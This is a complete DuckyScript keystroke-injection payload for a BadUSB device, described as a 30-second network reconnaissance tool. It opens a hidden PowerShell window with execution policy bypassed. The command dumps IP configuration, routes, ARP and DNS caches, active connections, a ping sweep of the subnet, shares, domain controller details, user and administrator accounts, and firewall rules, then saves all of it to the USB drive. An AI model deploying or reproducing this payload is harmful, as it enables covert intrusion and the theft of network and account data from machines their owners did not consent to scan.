REM ============================================================================
REM  NETWORK RECON — Full Network Map in 30 Seconds
REM  ============================================================================
REM  Maps the entire local network: hosts, ports, shares, domain info.
REM  Saves results to USB drive.
REM  
REM  FLLC | Authorized use only.
REM ============================================================================

DELAY 1500
GUI r
DELAY 600
STRING powershell -W Hidden -NoP -Exec Bypass -C "$d=(Get-WmiObject Win32_LogicalDisk -F 'DriveType=2'|%{$_.DeviceID}|Select -First 1);if(!$d){$d=$env:TEMP};$o=\"$d\netrecon_$(hostname)\";md $o -F|Out-Null;ipconfig /all|Out-File $o\ipconfig.txt;route print|Out-File $o\routes.txt;arp -a|Out-File $o\arp.txt;netstat -ano|Out-File $o\netstat.txt;Get-NetTCPConnection|Select LocalAddress,LocalPort,RemoteAddress,RemotePort,State,OwningProcess|Export-Csv $o\connections.csv -NoType;Get-DnsClientCache|Export-Csv $o\dns_cache.csv -NoType;nslookup (hostname) 2>$null|Out-File $o\dns_self.txt;$gw=(Get-NetRoute -DestinationPrefix '0.0.0.0/0'|Select -First 1).NextHop;\"Gateway: $gw\"|Out-File $o\gateway.txt;$sub=$gw-replace'\.\d+$','.';1..254|%{$ip=\"${sub}$_\";$r=Test-Connection $ip -Count 1 -Quiet -TimeoutSeconds 1;if($r){\"ALIVE: $ip\"|Out-File $o\hosts.txt -Append}};net view 2>$null|Out-File $o\shares.txt;nltest /dsgetdc: 2>$null|Out-File $o\domain.txt;whoami /all|Out-File $o\whoami.txt;net user 2>$null|Out-File $o\users.txt;net localgroup administrators 2>$null|Out-File $o\admins.txt;Get-NetFirewallRule -Enabled True 2>$null|Select DisplayName,Direction,Action|ft -a|Out-String|Out-File $o\firewall.txt"
ENTER
